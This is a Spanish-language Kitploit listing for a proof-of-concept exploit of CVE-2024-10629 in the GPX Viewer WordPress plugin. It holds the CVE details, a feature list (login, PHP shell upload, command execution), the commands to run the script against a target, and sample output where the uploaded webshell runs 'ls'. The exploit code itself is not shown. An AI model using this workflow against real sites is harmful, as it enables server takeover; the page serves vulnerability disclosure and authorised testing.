Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - Autenticado (Suscriptor+) Creación Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-10629
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - Autenticado (Suscriptor+) Creación Arbitraria de Archivos

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛠️ GPX Viewer Exploit (CVE-2024-10629)

Este repositorio contiene un exploit de prueba de concepto para el plugin GPX Viewer de WordPress, que es vulnerable a la creación arbitraria de archivos (CVE-2024-10629). La vulnerabilidad permite a atacantes autenticados con acceso de nivel suscriptor o superior crear archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente puede conducir a la ejecución remota de código.

📝 Detalles del CVE

  • ID del CVE: CVE-2024-10629
  • Publicado: 2024-11-13
  • Actualizado: 2024-11-13
  • Plugin vulnerable: GPX Viewer <= 2.2.8
  • Tipo de vulnerabilidad: Creación arbitraria de archivos autenticada (Suscriptor+)
  • Puntuación: 8.8 ALTA
  • Gravedad: ALTA
  • Versión: 3.1
  • Cadena del vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Descripción

El plugin GPX Viewer para WordPress es vulnerable a la creación arbitraria de archivos debido a una falta de comprobación de capacidades y de validación del tipo de archivo en la función gpxv_file_upload() en todas las versiones hasta la 2.2.8 incluida. Esto permite que atacantes autenticados, con acceso de nivel suscriptor o superior, creen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código.

🚀 Características

  • Inicio de sesión automático utilizando el nombre de usuario y la contraseña proporcionados.
  • Verificación de la versión del plugin GPX Viewer.
  • Sube un shell PHP al servidor.
  • Verifica la subida correcta del shell.
  • Ejecuta comandos en el servidor a través del shell subido.

📚 Uso

Requisitos previos

  • Python 3.x
  • Librería requests

Ejecutar el exploit

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. Instala la librería requerida:

    root@kitploit:~
    pip install requests
    
  3. Ejecuta el exploit:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    Reemplaza <target_url>, <username> y <password> con los valores adecuados.

Ejemplo

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

Salida

  • El script mostrará la versión del plugin y comprobará si es vulnerable.
  • A continuación, iniciará sesión con las credenciales proporcionadas e intentará subir el shell.
  • Si tiene éxito, verificará la subida del shell y ejecutará un comando de muestra (ls).
root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

Ejemplos de comandos

  • ls = Mostrar archivos
  • uname -a = Mostrar información del sistema

⚠️ Aviso legal

Este exploit está destinado únicamente a fines educativos y pruebas autorizadas. El uso no autorizado de este exploit contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético. Los autores y colaboradores de este repositorio no son responsables de ningún uso indebido o daño causado por este exploit.


Por: Khaled Alenazi (Nxploit)

Descargar herramienta